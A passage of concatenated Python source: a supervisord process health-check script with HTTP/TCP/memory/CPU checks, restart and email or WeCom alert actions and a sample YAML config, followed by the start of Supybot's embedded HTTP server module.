from xmlrpc.client import Transport, ServerProxy, Fault
def iterkeys(d, **kw):
return iter(d.keys(**kw))
def iteritems(d, **kw):
return iter(d.items(**kw))
else:
import httplib
from xmlrpclib import Transport, ServerProxy, Fault
def iterkeys(d, **kw):
return d.iterkeys(**kw)
def iteritems(d, **kw):
return d.iteritems(**kw)
def shell(cmd):
"""
Execute a system command.
:param cmd:
:return: (exitcode, stdout, stderr)
"""
# with os.popen(cmd) as f:
# return f.read()
env_to_pass = dict(os.environ)
proc = subprocess.Popen(cmd,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env_to_pass)
stdout, stderr = proc.communicate()
if PY3:
# communicate() returns bytes on Python 3; decode so callers can parse text
stdout = stdout.decode()
stderr = stderr.decode()
return (proc.returncode, stdout, stderr)
def get_proc_cpu(pid):
"""
Get the CPU utilization of a process.
:param pid:
:return:
"""
pscommand = 'ps -opcpu= -p %s'
_, data, _ = shell(pscommand % pid)
if not data:
# No data returned, or no such pid
return None
try:
cpu_utilization = data.strip()
cpu_utilization = float(cpu_utilization)
except ValueError:
# Result contains no data, or cpu_utilization cannot be parsed
return None
return cpu_utilization
def get_proc_rss(pid, cumulative=False):
"""
Get the memory usage (RSS) of a process.
:param pid:
:param cumulative:
:return:
"""
pscommand = 'ps -orss= -p %s'
pstreecommand = 'ps ax -o "pid= ppid= rss="'
ProcInfo = namedtuple('ProcInfo', ['pid', 'ppid', 'rss'])
def find_children(parent_pid, procs):
# Find the child processes of the given parent
children = []
for proc in procs:
pid, ppid, rss = proc
if ppid == parent_pid:
children.append(proc)
children.extend(find_children(pid, procs))
return children
if cumulative:
# Sum the rss of the process and its children
_, data, _ = shell(pstreecommand)
data = data.strip()
procs = []
for line in data.splitlines():
p_pid, p_ppid, p_rss = map(int, line.split())
procs.append(ProcInfo(pid=p_pid, ppid=p_ppid, rss=p_rss))
# Compute the total rss
try:
parent_proc = [p for p in procs if p.pid == pid][0]
children = find_children(pid, procs)
tree = [parent_proc] + children
rss = sum(map(int, [p.rss for p in tree]))
except (ValueError, IndexError):
# Return None on calculation errors
return None
else:
_, data, _ = shell(pscommand % pid)
if not data:
# No data returned, or no such pid
return None
try:
rss = data.strip()
rss = int(rss)
except ValueError:
# Result contains no data, or rss cannot be parsed
return None
rss = rss / 1024  # rss is reported in KB; return it in MB
return rss
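# Overview: with cumulative=True, get_proc_rss() sums the RSS of the whole
# process tree (the pid plus every descendant found via the ppid column of
# `ps ax -o "pid= ppid= rss="`); otherwise only the RSS of the pid itself is
# read. Either way the value is converted from KB to MB before returning.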
class WorkerThread(threading.Thread):
"""
Custom Thread that records exceptions raised inside the thread.
"""
def __init__(self, target=None, args=(), kwargs={}, name=None):
super(WorkerThread, self).__init__(target=target, args=args, kwargs=kwargs, name=name)
self._target = target
self._args = args
self._kwargs = kwargs
self.exception = None
def run(self):
try:
if self._target:
self._target(*self._args, **self._kwargs)
except Exception as e:
# Record the thread's exception
self.exception = sys.exc_info()
finally:
del self._target, self._args, self._kwargs
def get_exception(self):
return self.exception
class HealthCheck(object):
def __init__(self, config):
"""
初始化配置
:param config:
"""
self.mail_config = None
self.wechat_config = None
self.supervisord_url = 'unix:///var/run/supervisor.sock'
if 'config' in config:
self.mail_config = config['config'].get('mail')
self.wechat_config = config['config'].get('wechat')
self.supervisord_url = config['config'].get('supervisordUrl', self.supervisord_url)
self.supervisord_user = config['config'].get('supervisordUser', None)
self.supervisord_pass = config['config'].get('supervisordPass', None)
config.pop('config')
self.program_config = config
# Only these actions count as notification actions
self.notice_action = ['email', 'wechat']
self.periodSeconds = 5
self.failureThreshold = 3
self.successThreshold = 1
self.initialDelaySeconds = 1
self.sendResolved = False
self.max_rss = 1024
self.cumulative = False
self.max_cpu = 90
def get_supervisord_conn(self):
"""
Get a connection to supervisord.
:return:
"""
transport = SupervisorTransport(self.supervisord_user, self.supervisord_pass, self.supervisord_url)
s = ServerProxy('http://127.0.0.1', transport=transport)
return s
def get_pid(self, program, kind, pid_file):
"""
Get the pid of a process.
:param program:
:param kind:
:param pid_file:
:return:
"""
pid = 0
err = ''
if kind == 'supervisor':
# Get the pid from supervisor
try:
s = self.get_supervisord_conn()
info = s.supervisor.getProcessInfo(program)
pid = info.get('pid')
err = info.get('description')
except Exception as e:
self.log(program, "PID: Can't get pid from supervisor %s ", e)
elif kind == 'name':
# Get the pid by process name
pscommand = "ps -A -o pid,cmd | grep '[%s]%s' | awk '{print $1}' | head -1"
exitcode, stdout, stderr = shell(pscommand % (program[0], program[1:]))
if exitcode == 0:
pid = stdout.strip()
else:
self.log(program, "PID: Can't get pid from name %s ", stderr)
pid = 0
err = stderr
elif kind == 'file':
# Get the pid from a pid file
if pid_file:
try:
with open(pid_file) as f:
pid = f.read().strip()
except Exception as e:
self.log(program, "PID: Can't get pid from file %s ", e)
err = "Can't get pid from file"
else:
err = "PID: pid file not set."
self.log(program, err)
if not pid:
pid = 0
return pid, err
def log(self, program, msg, *args):
"""
Write a message to STDERR.
:param program:
:param msg:
:param args:
:return:
"""
curr_dt = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
sys.stderr.write(
'%s [%s] %s\n' % (curr_dt, program, msg % args,))
sys.stderr.flush()
def check(self, config):
"""
Main check loop.
:param config:
:return:
"""
check_state = {}
program = config.get('program')
periodSeconds = config.get('periodSeconds', self.periodSeconds)
failureThreshold = config.get('failureThreshold', self.failureThreshold)
successThreshold = config.get('successThreshold', self.successThreshold)
initialDelaySeconds = config.get('initialDelaySeconds', self.initialDelaySeconds)
sendResolved = config.get('sendResolved', self.sendResolved)
action_type = config.get('action', 'restart')
check_type = config.get('type', 'http').lower()
if check_type == 'http':
check_method = self.http_check
elif check_type == 'tcp':
check_method = self.tcp_check
elif check_type == 'mem':
check_method = self.mem_check
elif check_type == 'cpu':
check_method = self.cpu_check
else:
# Unknown check type: fall back to the default http check
check_method = self.http_check
while 1:
if program not in check_state:
check_state[program] = {
'periodSeconds': 1,
'failure': 0,
'success': 0,
'action': False
}
self.log(program, '[CONFIG]: %s', config)
time.sleep(initialDelaySeconds)
# self.log(program, '%s check state: %s', check_type, json.dumps(check_state[program]))
if check_state[program]['periodSeconds'] % periodSeconds == 0:
check_result = check_method(config)
check_status = check_result.get('status', None)
check_info = check_result.get('info', '')
self.log(program, '[%s check]: info(%s) state(%s)', check_type.upper(), check_info, check_status)
if check_status == 'failure':
check_state[program]['failure'] += 1
elif check_status == 'success':
check_state[program]['success'] += 1
# First evaluate the success count
if check_state[program]['success'] >= successThreshold:
# A recovery notification is sent only if sendResolved is enabled and an action was triggered after a failure
if sendResolved and check_state[program]['action']:
send_action = ','.join(list(set(action_type.split(',')) & set(self.notice_action)))
self.log(program, '[Resolved] Use %s.', send_action)
action_param = {
'check_status': check_status,
'action_type': send_action,
'msg': check_result.get('msg', '')
}
self.action(program, **action_param)
# After a success, reset the program's state
check_state[program]['failure'] = 0
check_state[program]['success'] = 0
check_state[program]['action'] = False
# Then evaluate the failure count
if check_state[program]['failure'] >= failureThreshold:
# After a failure, trigger the action only once, or again whenever the failure count is divisible by 2 * (periodSeconds + initialDelaySeconds) (so a failed restart doesn't leave the service down forever)
if not check_state[program]['action'] or (
check_state[program]['failure'] != 0 and check_state[program]['failure'] % (
(periodSeconds + initialDelaySeconds) * 2) == 0):
action_param = {
'config': config,
'action_type': action_type,
'check_status': check_status,
'msg': check_result.get('msg', '')
}
self.action(program, **action_param)
check_state[program]['action'] = True
# Reset the interval counter
check_state[program]['periodSeconds'] = 0
time.sleep(1)
check_state[program]['periodSeconds'] += 1
def http_check(self, config):
"""
Check an HTTP endpoint.
:param config:
:return: dict
"""
program = config.get('program')
config_host = config.get('host', 'localhost')
config_path = config.get('path', '/')
config_port = config.get('port', '80')
config_method = config.get('method', 'GET')
config_timeoutSeconds = config.get('timeoutSeconds', 3)
config_body = config.get('body', '')
config_json = config.get('json', '')
config_hearders = config.get('hearders', '')
config_username = config.get('username', '')
config_password = config.get('password', '')
HEADERS = {'User-Agent': 'leops http_check'}
headers = HEADERS.copy()
if config_hearders:
try:
headers.update(json.loads(config_hearders))
except Exception as e:
self.log(program, '[http_check]: hearders option could not be parsed: %s, %s', config_hearders, e)
if config_json:
headers['Content-Type'] = 'application/json'
if config_username and config_password:
auth_str = '%s:%s' % (config_username, config_password)
headers['Authorization'] = 'Basic %s' % base64.b64encode(auth_str.encode()).decode()
if config_json:
try:
config_body = json.dumps(config_json)
except Exception as e:
self.log(program, '[http_check]: json option could not be serialized: %s, %s', config_json, e)
check_info = '%s %s %s %s %s %s' % (config_host, config_port, config_path, config_method,
config_body, headers)
httpClient = None
try:
httpClient = httplib.HTTPConnection(config_host, config_port, timeout=config_timeoutSeconds)
httpClient.request(config_method, config_path, config_body, headers=headers)
res = httpClient.getresponse()
except Exception as e:
self.log(program, '[http_check]: conn error, %s', e)
return {'status': 'failure', 'msg': '[http_check] %s' % e, 'info': check_info}
finally:
if httpClient:
httpClient.close()
if res.status != httplib.OK:
return {'status': 'failure', 'msg': '[http_check] return code %s' % res.status, 'info': check_info}
return {'status': 'success', 'msg': '[http_check] return code %s' % res.status, 'info': check_info}
def tcp_check(self, config):
"""
Check a TCP connection.
:param config:
:return: dict
"""
program = config.get('program')
host = config.get('host', 'localhost')
port = config.get('port', 80)
timeoutSeconds = config.get('timeoutSeconds', 3)
check_info = '%s %s' % (host, port)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeoutSeconds)
sock.connect((host, port))
sock.close()
except Exception as e:
self.log(program, '[tcp_check]: conn error, %s', e)
return {'status': 'failure', 'msg': '[tcp_check] %s' % e, 'info': check_info}
return {'status': 'success', 'msg': '[tcp_check] connection succeeded', 'info': check_info}
def mem_check(self, config):
"""
Check the memory usage of a process.
:param config:
:return: dict
"""
program = config.get('program')
max_rss = config.get('maxRss', self.max_rss)
cumulative = config.get('cumulative', self.cumulative)
pid_get = config.get('pidGet', 'supervisor')
pid_file = config.get('pidFile', )
check_info = 'max_rss:%sMB cumulative:%s' % (max_rss, cumulative)
pid, err = self.get_pid(program, pid_get, pid_file)
if pid == 0:
self.log(program, '[mem_check]: check error, program not starting.')
return {'status': 'failure',
'msg': '[mem_check] program not starting, message: %s.' % err,
'info': check_info}
now_rss = get_proc_rss(pid, cumulative)
check_info = '%s now_rss:%sMB pid:%s' % (check_info, now_rss, pid)
if now_rss >= int(max_rss):
return {'status': 'failure', 'msg': '[mem_check] max_rss(%sMB) now_rss(%sMB)' % (max_rss, now_rss),
'info': check_info}
return {'status': 'success', 'msg': '[mem_check] max_rss(%sMB) now_rss(%sMB)' % (max_rss, now_rss),
'info': check_info}
def cpu_check(self, config):
"""
Check the CPU usage of a process.
:param config:
:return: dict
"""
program = config.get('program')
max_cpu = config.get('maxCpu', self.max_cpu)
pid_get = config.get('pidGet', 'supervisor')
pid_file = config.get('pidFile', )
check_info = 'max_cpu:{cpu}%'.format(cpu=max_cpu)
pid, err = self.get_pid(program, pid_get, pid_file)
if pid == 0:
self.log(program, '[cpu_check]: check error, program not starting.')
return {'status': 'failure',
'msg': '[cpu_check] program not starting, message: %s.' % err,
'info': check_info}
now_cpu = get_proc_cpu(pid)
check_info = '{info} now_cpu:{now}% pid:{pid}'.format(info=check_info, now=now_cpu, pid=pid)
if now_cpu >= int(max_cpu):
return {'status': 'failure',
'msg': '[cpu_check] max_cpu({max_cpu}%) now_cpu({now}%)'.format(max_cpu=max_cpu, now=now_cpu),
'info': check_info}
return {'status': 'success',
'msg': '[cpu_check] max_cpu({max_cpu}%) now_cpu({now}%)'.format(max_cpu=max_cpu, now=now_cpu),
'info': check_info}
def action(self, program, **args):
"""
Execute the configured actions.
:param program:
:param args:
:return: None
"""
action_type = args.get('action_type')
msg = args.get('msg')
check_status = args.get('check_status')
config = args.get('config')
self.log(program, '[Action: %s]', action_type)
action_list = action_type.split(',')
if 'restart' in action_list:
restart_result = self.action_supervisor_restart(program)
msg += '\r\n Restart:%s' % restart_result
elif 'exec' in action_list:
action_exec_cmd = config.get('action_exec_cmd')
exec_result = self.action_exec(program, action_exec_cmd)
msg += '\r\n Exec:%s' % exec_result
elif 'kill' in action_list:
pid_get = config.get('pidGet', 'supervisor')
pid_file = config.get('pidFile', )
pid, err = self.get_pid(program, pid_get, pid_file)
kill_result = self.action_kill(program, pid)
msg += '\r\n Kill:%s' % kill_result
if 'email' in action_list and self.mail_config:
self.action_email(program, action_type, msg, check_status)
if 'wechat' in action_list and self.wechat_config:
self.action_wechat(program, action_type, msg, check_status)
def action_supervisor_restart(self, program):
"""
Restart the process via the supervisor RPC interface.
:param program:
:return:
"""
result = 'success'
try:
s = self.get_supervisord_conn()
info = s.supervisor.getProcessInfo(program)
except Exception as e:
result = 'Get %s ProcessInfo Error: %s' % (program, e)
self.log(program, '[Action: restart] %s' % result)
return result
if info['state'] == 20:
try:
stop_result = s.supervisor.stopProcess(program)
self.log(program, '[Action: restart] stop result %s', stop_result)
except Fault as e:
result = 'Failed to stop process %s, exiting: %s' % (program, e)
self.log(program, '[Action: restart] stop error %s', result)
return result
time.sleep(1)
info = s.supervisor.getProcessInfo(program)
if info['state'] != 20:
try:
start_result = s.supervisor.startProcess(program)
self.log(program, '[Action: restart] start result %s', start_result)
except Fault as e:
result = 'Failed to start process %s, exiting: %s' % (program, e)
self.log(program, '[Action: restart] start error %s', result)
return result
return result
def action_exec(self, program, cmd):
"""
Execute a system command.
:param program:
:param cmd:
:return:
"""
result = 'success'
exitcode, stdout, stderr = shell(cmd)
if exitcode == 0:
self.log(program, "[Action: exec] result success")
else:
result = 'Failed to exec %s, exiting: %s' % (program, exitcode)
self.log(program, "[Action: exec] result %s", result)
return result
def action_kill(self, program, pid):
"""
Kill the process.
:param program:
:param pid:
:return:
"""
result = 'success'
if int(pid) < 3:
return 'Failed to kill %s, pid: %s '% (program, pid)
cmd = "kill -9 %s" % pid
exitcode, stdout, stderr = shell(cmd)
if exitcode == 0:
self.log(program, "[Action: kill] result success")
else:
result = 'Failed to kill %s, pid: %s exiting: %s' % (program, pid, exitcode)
self.log(program, "[Action: kill] result %s", result)
return result
def action_email(self, program, action_type, msg, check_status):
"""
Send an email notification.
:param program:
:param action_type:
:param msg:
:param check_status:
:return:
"""
ip = ""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(('8.8.8.8', 80))
ip = s.getsockname()[0]
except Exception as e:
self.log(program, '[Action: email] get ip error %s' % e)
finally:
s.close()
hostname = platform.node().split('.')[0]
system_platform = platform.platform()
if check_status == 'success':
subject = "[Supervisor] %s Health check successful" % program
else:
subject = "[Supervisor] %s Health check failed" % program
curr_dt = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
content = """
DateTime: {curr_dt}
Program: {program}
IP: {ip}
Hostname: {hostname}
Platform: {system_platform}
Action: {action}
Msg: {msg}
""".format(curr_dt=curr_dt, program=program, ip=ip, hostname=hostname, system_platform=system_platform,
action=action_type, msg=msg)
mail_port = self.mail_config.get('port', '')
mail_host = self.mail_config.get('host', '')
mail_user = self.mail_config.get('user', '')
mail_pass = self.mail_config.get('pass', '')
to_list = self.mail_config.get('to_list', [])
msg = MIMEText(content, _subtype='plain', _charset='utf-8')
msg['Subject'] = Header(subject, 'utf-8')
msg['From'] = mail_user
msg['To'] = ",".join(to_list)
try:
s = smtplib.SMTP_SSL(mail_host, mail_port)
s.login(mail_user, mail_pass)
s.sendmail(mail_user, to_list, msg.as_string())
s.quit()
except Exception as e:
self.log(program, '[Action: email] send error %s' % e)
return False
self.log(program, '[Action: email] send success.')
return True
def action_wechat(self, program, action_type, msg, check_status):
"""
Send a WeChat Work (WeCom) notification.
:param program:
:param action_type:
:param msg:
:param check_status:
:return:
"""
host = "qyapi.weixin.qq.com"
corpid = self.wechat_config.get('corpid')
secret = self.wechat_config.get('secret')
agentid = self.wechat_config.get('agentid')
touser = self.wechat_config.get('touser')
toparty = self.wechat_config.get('toparty')
totag = self.wechat_config.get('totag')
headers = {
'Content-Type': 'application/json'
}
access_token_url = '/cgi-bin/gettoken?corpid={id}&corpsecret={crt}'.format(id=corpid, crt=secret)
try:
httpClient = httplib.HTTPSConnection(host, timeout=10)
httpClient.request("GET", access_token_url, headers=headers)
response = httpClient.getresponse()
token = json.loads(response.read())['access_token']
except Exception as e:
self.log(program, '[Action: wechat] get token error %s' % e)
return False
finally:
if httpClient:
httpClient.close()
send_url = '/cgi-bin/message/send?access_token={token}'.format(token=token)
ip = ""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(('8.8.8.8', 80))
ip = s.getsockname()[0]
except Exception as e:
self.log(program, '[Action: wechat] get ip error %s' % e)
finally:
s.close()
hostname = platform.node().split('.')[0]
system_platform = platform.platform()
curr_dt = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
if check_status == 'success':
title = "<font color=\"info\">[Supervisor] %s Health check successful</font>" % program
else:
title = "<font color=\"warning\">[Supervisor] %s Health check failed</font>" % program
content = "{title}\n \
> **详情信息**\n \
> DataTime: {curr_dt}\n \
> Program: <font color=\"warning\">{program}</font>\n \
> IP: {ip}\n \
> Hostname: {hostname}\n \
> Platfrom: {platfrom}\n \
> Action: {action}\n \
> Msg: {msg}".format(title=title, curr_dt=curr_dt, program=program, ip=ip, hostname=hostname,
platfrom=system_platform, action=action_type, msg=msg)
data = {
"msgtype": 'markdown',
"agentid": agentid,
"markdown": {'content': content},
"safe": 0
}
if touser:
data['touser'] = touser
if toparty:
data['toparty'] = toparty
if totag:
data['totag'] = totag
try:
httpClient = httplib.HTTPSConnection(host, timeout=10)
httpClient.request("POST", send_url, json.dumps(data), headers=headers)
response = httpClient.getresponse()
result = json.loads(response.read())
if result['errcode'] != 0:
self.log(program, '[Action: wechat] send failed %s' % result)
return False
except Exception as e:
self.log(program, '[Action: wechat] send error %s' % e)
return False
finally:
if httpClient:
httpClient.close()
self.log(program, '[Action: wechat] send success')
return True
def start(self):
"""
Start all checks.
:return:
"""
self.log('healthCheck', 'start')
threads = []
threads_data = {}
for key, value in iteritems(self.program_config):
item = value
item['program'] = key
t = WorkerThread(target=self.check, args=(item,), name=key)
threads.append(t)
threads_data[key] = item
for t in threads:
t.daemon = True
t.start()
while 1:
time.sleep(0.1)
for i, t in enumerate(threads):
if not t.is_alive():
thread_name = t.name
self.log('healthCheck', '[ERROR] Exception in %s (caught by main): %s', thread_name, t.get_exception())
self.log('healthCheck', '[ERROR] Creating a new thread!')
t = WorkerThread(target=self.check, args=(threads_data[thread_name],), name=thread_name)
t.daemon = True
t.start()
threads[i] = t
if __name__ == '__main__':
# Signal handling
def sig_handler(signum, frame):
print("Exit check!")
sys.exit(0)
signal.signal(signal.SIGINT, sig_handler)
signal.signal(signal.SIGTERM, sig_handler)
signal.signal(signal.SIGQUIT, sig_handler)
# Look for the config file next to this script; generate a template if it does not exist
config_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'config.yaml')
if not os.path.exists(config_file):
example_config = """
config: # script configuration section, do not rename
# supervisordUrl: http://localhost:9001/RPC2 # supervisor RPC endpoint; defaults to the local socket file unix:///var/run/supervisor.sock
# supervisordUser: user # username configured in supervisor, omit if not set
# supervisordPass: pass # password configured in supervisor, omit if not set
# mail: # email notification settings
# host: 'smtp.test.com'
# port: '465'
# user: 'ops@test.com'
# pass: '123456'
# to_list: ['test@test.com']
# wechat: # WeChat Work (WeCom) notification settings
# corpid:
# secret:
# agentid:
# touser:
# toparty:
# totag:
# Memory monitoring
cat1: # program name as configured in supervisor
type: mem # check type: http,tcp,mem,cpu default: http
maxRss: 1024 # memory threshold in MB, exceeding it counts as a failure. default: 1024
cumulative: True # whether to include the memory of child processes. default: False
pidGet: supervisor # how to obtain the pid: supervisor,name,file; with name the pid is looked up by program name, with file pidFile must be set. default: supervisor
pidFile: /var/run/t.pid # path of the pid file, only used when pidGet is file
periodSeconds: 10 # how often to check, in seconds. default: 5
initialDelaySeconds: 10 # delay before the first check, in seconds. default: 1
failureThreshold: 3 # minimum number of consecutive failed checks after a success before the check is considered failed. default: 3
successThreshold: 2 # minimum number of consecutive successful checks after a failure before the check is considered recovered. default: 1
action: restart,email # actions to trigger: restart,exec,email,wechat (restart and exec are mutually exclusive; restart wins when both are set). default: restart
action_exec_cmd: command # command executed by the exec action
sendResolved: True # whether to send a recovery notification, only used with email,wechat. default: False
# CPU monitoring
cat2: # program name as configured in supervisor
type: cpu # check type: http,tcp,mem,cpu default: http
maxCpu: 80 # CPU threshold in %, exceeding it counts as a failure. default: 90%
pidGet: supervisor # how to obtain the pid: supervisor,name,file; with name the pid is looked up by program name, with file pidFile must be set. default: supervisor
pidFile: /var/run/t.pid # path of the pid file, only used when pidGet is file
periodSeconds: 10 # how often to check, in seconds. default: 5
initialDelaySeconds: 10 # delay before the first check, in seconds. default: 1
failureThreshold: 3 # minimum number of consecutive failed checks after a success before the check is considered failed. default: 3
successThreshold: 2 # minimum number of consecutive successful checks after a failure before the check is considered recovered. default: 1
action: restart,email # actions to trigger: restart,exec,email,wechat (restart and exec are mutually exclusive; restart wins when both are set). default: restart
action_exec_cmd: command # command executed by the exec action
sendResolved: True # whether to send a recovery notification, only used with email,wechat. default: False
# HTTP monitoring
cat3:
type: http
method: POST # HTTP method: POST,GET default: GET
host: 127.0.0.1 # host address. default: localhost
path: / # URI path. default: /
port: 8080 # port to check. default: 80
json: '{"a":"b"}' # JSON body to POST
hearders: '{"c":1}' # HTTP header data
username: test # username for HTTP basic auth
password: pass # password for HTTP basic auth
periodSeconds: 10 # how often to check, in seconds. default: 5
initialDelaySeconds: 10 # delay before the first check, in seconds. default: 1
timeoutSeconds: 5 # check timeout, in seconds. default: 3
failureThreshold: 3 # minimum number of consecutive failed checks after a success before the check is considered failed. default: 3
successThreshold: 2 # minimum number of consecutive successful checks after a failure before the check is considered recovered. default: 1
action: restart,email # actions to trigger: restart,exec,email,wechat (restart and exec are mutually exclusive; restart wins when both are set). default: restart
action_exec_cmd: command # command executed by the exec action
sendResolved: True # whether to send a recovery notification, only used with email,wechat. default: False
# TCP monitoring
cat4:
type: tcp
host: 127.0.0.1 # host address. default: localhost
port: 8082 # port to check. default: 80
periodSeconds: 10 # how often to check, in seconds. default: 5
initialDelaySeconds: 10 # delay before the first check, in seconds. default: 1
timeoutSeconds: 5 # check timeout, in seconds. default: 3
failureThreshold: 3 # minimum number of consecutive failed checks after a success before the check is considered failed. default: 3
successThreshold: 2 # minimum number of consecutive successful checks after a failure before the check is considered recovered. default: 1
action: restart,email # actions to trigger: restart,exec,email,wechat (restart and exec are mutually exclusive; restart wins when both are set). default: restart
action_exec_cmd: command # command executed by the exec action
sendResolved: True # whether to send a recovery notification, only used with email,wechat. default: False
"""
with open(config_file, 'w') as f:
f.write(example_config)
print("\r\n\r\nThe configuration file has been initialized, please modify the file to start.")
print("Config File: %s\r\n\r\n" % config_file)
sys.exit(0)
with open(config_file) as f:
config = yaml.safe_load(f)
check = HealthCheck(config)
check.start()
|
httpserver.py
|
###
# Copyright (c) 2011, Valentin Lorentz
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
"""
An embedded and centralized HTTP server for Supybot's plugins.
"""
import os
import sys
import cgi
import socket
from threading import Event, Thread
from cStringIO import StringIO
from SocketServer import ThreadingMixIn
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
# For testing purposes
from SocketServer import StreamRequestHandler
import supybot.log as log
import supybot.conf as conf
import supybot.world as world
from supybot.i18n import PluginInternationalization
_ = PluginInternationalization()
configGroup = conf.supybot.servers.http
class RequestNotHandled(Exception):
pass
DEFAULT_TEMPLATES = {
'index.html': """\
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>""" + _('Supybot Web server index') + """</title>
<link rel="stylesheet" type="text/css" href="/default.css" media="screen" />
</head>
<body class="purelisting">
<h1>Supybot web server index</h1>
<p>""" + _('Here is a list of the plugins that have a Web interface:') +\
"""
</p>
%(list)s
</body>
</html>""",
'generic/error.html': """\
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>%(title)s</title>
<link rel="stylesheet" href="/default.css" />
</head>
<body class="error">
<h1>Error</h1>
<p>%(error)s</p>
</body>
</html>""",
'default.css': """\
body {
background-color: #F0F0F0;
}
/************************************
* Classes that plugins should use. *
************************************/
/* Error pages */
body.error {
text-align: center;
}
body.error p {
background-color: #FFE0E0;
border: 1px #FFA0A0 solid;
}
/* Pages that only contain a list. */
.purelisting {
text-align: center;
}
.purelisting ul {
margin: 0;
padding: 0;
}
.purelisting ul li {
margin: 0;
padding: 0;
list-style-type: none;
}
/* Pages that only contain a table. */
.puretable {
text-align: center;
}
.puretable table
{
width: 100%;
border-collapse: collapse;
text-align: center;
}
.puretable table th
{
/*color: #039;*/
padding: 10px 8px;
border-bottom: 2px solid #6678b1;
}
.puretable table td
{
padding: 9px 8px 0px 8px;
border-bottom: 1px solid #ccc;
}
""",
'robots.txt': """""",
}
def set_default_templates(defaults):
for filename, content in defaults.items():
path = conf.supybot.directories.data.web.dirize(filename)
if os.path.isfile(path + '.example'):
os.unlink(path + '.example')
if not os.path.isdir(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
with open(path + '.example', 'a') as fd:
fd.write(content)
set_default_templates(DEFAULT_TEMPLATES)
def get_template(filename):
path = conf.supybot.directories.data.web.dirize(filename)
if os.path.isfile(path):
return open(path, 'r').read()
else:
assert os.path.isfile(path + '.example'), path + '.example'
return open(path + '.example', 'r').read()
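# Overview: the defaults above are written as '<name>.example' files under the
# directory configured as supybot.directories.data.web. An administrator can
# override any template by creating the file without the '.example' suffix;
# get_template() prefers that file when it exists.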
class RealSupyHTTPServer(HTTPServer):
# TODO: make this configurable
timeout = 0.5
running = False
def __init__(self, address, protocol, callback):
if protocol == 4:
self.address_family = socket.AF_INET
elif protocol == 6:
self.address_family = socket.AF_INET6
else:
raise AssertionError(protocol)
HTTPServer.__init__(self, address, callback)
self.callbacks = {}
def hook(self, subdir, callback):
if subdir in self.callbacks:
log.warning(('The HTTP subdirectory `%s` was already hooked and '
'is now being claimed by another callback (or maybe you '
'reloaded the plugin and it didn\'t properly unhook). '
'Forcing unhook.') % subdir)
self.callbacks[subdir] = callback
def unhook(self, subdir):
callback = self.callbacks.pop(subdir) # May raise a KeyError. We don't care.
callback.doUnhook(self)
return callback
def __str__(self):
return 'server at %s %i' % self.server_address[0:2]
class TestSupyHTTPServer(RealSupyHTTPServer):
def __init__(self, *args, **kwargs):
self.callbacks = {}
def serve_forever(self, *args, **kwargs):
pass
def shutdown(self, *args, **kwargs):
pass
if world.testing:
SupyHTTPServer = TestSupyHTTPServer
else:
SupyHTTPServer = RealSupyHTTPServer
class SupyHTTPRequestHandler(BaseHTTPRequestHandler):
def do_X(self, callbackMethod, *args, **kwargs):
if self.path == '/':
callback = SupyIndex()
elif self.path in ('/robots.txt',):
callback = Static('text/plain; charset=utf-8')
elif self.path in ('/default.css',):
callback = Static('text/css')
elif self.path == '/favicon.ico':
callback = Favicon()
else:
subdir = self.path.split('/')[1]
try:
callback = self.server.callbacks[subdir]
except KeyError:
callback = Supy404()
# Some shortcuts
for name in ('send_response', 'send_header', 'end_headers', 'rfile',
'wfile', 'headers'):
setattr(callback, name, getattr(self, name))
# We call doX, because this is more supybotic than do_X.
path = self.path
if not callback.fullpath:
path = '/' + path.split('/', 2)[-1]
getattr(callback, callbackMethod)(self, path,
*args, **kwargs)
def do_GET(self):
self.do_X('doGet')
def do_POST(self):
if 'Content-Type' not in self.headers:
self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
form = cgi.FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD':'POST',
'CONTENT_TYPE':self.headers['Content-Type'],
})
self.do_X('doPost', form=form)
def do_HEAD(self):
self.do_X('doHead')
def log_message(self, format, *args):
